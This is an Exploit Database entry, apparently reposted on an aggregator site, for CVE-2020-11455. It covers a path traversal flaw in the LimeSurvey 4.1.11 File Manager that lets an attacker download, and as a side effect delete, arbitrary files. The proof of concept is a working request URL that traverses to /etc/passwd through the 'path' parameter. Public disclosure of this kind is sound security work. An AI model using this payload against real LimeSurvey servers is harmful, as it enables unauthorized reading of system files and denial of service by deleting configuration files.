LimeSurvey 4.1.11 – ‘File Manager’ Path Traversal

• Exploit Database
• 11 阅读

• 作者： Matthew Aberegg
  日期： 2020-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48297/

• # Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
  # Date: 2020-04-02
  # Exploit Author: Matthew Aberegg, Michael Burkey
  # Vendor Homepage: https://www.limesurvey.org
  # Version: LimeSurvey 4.1.11+200316
  # Tested on: Ubuntu 18.04.4
  # CVE : CVE-2020-11455
  
  # Vulnerability Details
  # Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
  # that allows an attacker to download arbitrary files.The file manager functionality will also 
  # delete the file after it is downloaded (if the web service account has permissions to do so), 
  # allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
  Vulnerable Parameter : "path"
  
  
  # POC
  https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd